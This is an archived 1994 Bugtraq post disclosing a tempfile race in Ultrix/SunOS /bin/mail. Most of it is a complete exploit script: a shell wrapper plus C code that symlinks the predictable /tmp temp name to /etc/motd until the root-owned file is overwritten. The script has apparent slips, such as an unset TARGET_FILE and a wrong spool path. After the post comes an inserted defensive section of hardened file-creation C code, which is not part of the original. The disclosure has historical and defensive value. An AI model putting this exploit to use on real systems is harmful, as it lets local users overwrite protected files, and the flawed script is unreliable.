Bugtraq mailing list archives
/bin/mail Security Hole
From: nlawson () galaxy csc calpoly edu (Nathan Lawson)
Date: Sat, 26 Nov 1994 00:42:09 -0800 (PST)
Hello all,

I heard a lot of talk a while back about another two holes in binmail(1). No one seemed to know or be willing to tell exactly what it was. I spent some time doing "strings" on /bin/mail and guessed that it had several problems. It used mktemp.c to make the temporary mailbox in /tmp and the lock file in /usr/spool/mail (both unsafe paths). Since it also seemed to use fopen.c for the actual file creation, I realized that a race definitely existed.

A few days ago, I heard rumors of an unreleased 8lgm script that exploited these two holes. After a little mucking around, I worked out the following script. I have been told that it works on Ultrix 4.2, as well as SunOS 4.1.X. It exploits the tempfile race, but can easily be modified to race with the lock file.

I definitely recommend that all you administrators who haven't upgraded to "mail.local.c" or procmail do so. Above all, FIX THIS HOLE.

As to 8lgm, I definitely supported you in the past, but turning to security through obscurity this late in the game is a turn for the worse. If you have written an exploit, make it public, or do NOT give it to anyone, not even your best friend's dog. There's a lesson to be learned that has been repeated throughout history: give out copies to only a few people, and the entire cracker community will get it. Let's see a little more "all or nothing" commitment from the security community.

-Nate (nlawson () galaxy calpoly edu)

------------------------ cut here ----------------------------
#!/bin/sh
#
# This exploits a flaw in Ultrix/SunOS binmail(1), and attempts
# to embarrass the admin, by creating an motd entry.
#
# Written 1994 by Nate Lawson <nlawson () galaxy calpoly edu>
# Minor Revisions by Chris Ellwood <cellwood () gauss calpoly edu>
# Thanks go to 8lgm for the basic script format.

PATH=/usr/ucb:/usr/bin:/bin
export PATH
IFS=" "
export IFS

PROG="`basename $0`"
ME="`whoami`"
PWENT="I would fix this big hole guys!!!"

cat > race.c << 'EOF'
#define TARGET "/etc/motd"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int main( ac,av)
int ac;
char **av;
{
    unsigned int pid,bpid;          /* Some machines don't have pid_t */
    int i;
    char target[13];

    strcpy (target,"/tmp/maa");     /* General format for binmail temp names */
    if ((pid = fork())==0) {
        sleep (2);
        nice (19);                      /* Increase our chances and ... */
        execl ("/bin/mail","mail",0);   /* Fork binmail */
    }
    bpid=pid;                           /* back up our pid for a later time */
    for (i=11;i>=8;i--) {
        target[i]=(pid%10) + '0';       /* Make the name for the tempfile */
        pid /= 10;
    }
    while (!symlink(TARGET,target))
        unlink (target);                /* Point that mktemp()'d file to the pot of gold */
    while (symlink(TARGET,target))
        unlink (target);                /* Probably not necessary, but what the heck */
    kill(bpid,1);                       /* Clean up, don't want to lag the system */
}
EOF

cc -O -s -o race race.c

# Check we now have race
if [ ! -x "race" ]; then
    echo "$PROG: couldnt compile race.c - lame!"
    exit 1
fi

OLD_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null
NEW_TARGET_LEN=$OLD_TARGET_LEN

cp /usr/spool/mail/$ME /tmp/$$      # Backup the mail spool.. we need it
cp /dev/null /usr/spool/mail/$ME
echo "" >> /usr/spool/mail/$ME
echo $PWENT >> /usr/spool/mail/$ME
echo "" >> /usr/spool/mail/$ME

while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do
    ./race &
    RACE_PID=$!
    sleep 4
    NEW_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null
    kill -9 $RACE_PID
done

# We won the race
echo "Succeeded.."

# Add back our spool.. don't want to lose our mail.
cp /dev/null /usr/spool/$ME
cp /tmp/$$ /usr/spool/mail/$ME
rm -f /tmp/$$ race race.c
exit 0
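The defect the post describes is mktemp()-style predictable names followed by an fopen() that happily follows whatever is already at that path. The following is an added example, not code from the post or from binmail, showing the hardened creation pattern (O_CREAT|O_EXCL, or mkstemp(), plus an fstat() check on the descriptor) and a self-check that plants a symlink at a pid-derived name in a private directory and confirms the opener refuses it; the directory name, function names and "victim" link target are constructed for the demo.

```c
#define _GNU_SOURCE   /* mkdtemp, mkstemp, O_NOFOLLOW on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Checked on the fd, not the path, so nothing can be swapped after the check:
 * a fresh, empty regular file owned by us with a single link. */
static int fd_is_fresh_regular(int fd) {
    struct stat st;
    return fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && st.st_nlink == 1 &&
           st.st_uid == geteuid() && st.st_size == 0;
}
/* Hardened replacement for mktemp()+fopen(): with O_EXCL the kernel refuses
 * if anything already sits at the path, a dangling symlink included, so a
 * planted link cannot redirect the write. Returns fd or -1 with errno set. */
int create_exclusive(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    if (!fd_is_fresh_regular(fd)) { close(fd); errno = EEXIST; return -1; }
    return fd;
}
/* Unpredictable name and exclusive creation in one call; `tmpl` must end in
 * "XXXXXX" and is overwritten with the name chosen. */
int create_unpredictable(char *tmpl) {
    int fd = mkstemp(tmpl);
    if (fd >= 0 && !fd_is_fresh_regular(fd)) { close(fd); return -1; }
    return fd;
}
/* Self-check in a private directory constructed for the demo: plant a symlink
 * at the kind of name binmail used (fixed prefix plus pid), confirm the
 * hardened opener refuses it, then confirm the mkstemp path works.
 * Returns 0 on pass, otherwise the number of the failing step. */
int self_check(void) {
    char dir[] = "/tmp/safe-create-demo-XXXXXX", link[64], tmpl[64];
    if (!mkdtemp(dir)) return 1;
    snprintf(link, sizeof link, "%s/maa%05d", dir, (int)getpid());
    if (symlink("victim", link) != 0) { rmdir(dir); return 2; } /* dangling is enough */
    int fd = create_exclusive(link), refused = (fd < 0 && errno == EEXIST);
    if (fd >= 0) close(fd);
    unlink(link);
    if (!refused) { rmdir(dir); return 3; }
    snprintf(tmpl, sizeof tmpl, "%s/maaXXXXXX", dir);
    fd = create_unpredictable(tmpl);
    if (fd >= 0) { close(fd); unlink(tmpl); }
    rmdir(dir);
    return fd >= 0 ? 0 : 4;
}
```

A daemon that must create files in a world-writable spool or /tmp should also run the creation as the unprivileged user where possible, so that even a won race writes only what that user could already write.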
Current thread:
- /bin/mail Security Hole Nathan Lawson (Nov 26)
- Re: /bin/mail Security Hole Casper Dik (Nov 26)
- Re: /bin/mail Security Hole Neil Woods (Nov 26)
- [8lgm]-Advisory-8.UNIX.SunOS-kernel.11-Nov-1994 [8LGM] Security Team (Nov 27)
- [8lgm]-Advisory-9.UNIX.urestore.10-Feb-1993 [8LGM] Security Team (Nov 27)
- [8lgm]-Advisory-13.UNIX.SCO-login.15-Apr-1994 [8LGM] Security Team (Nov 27)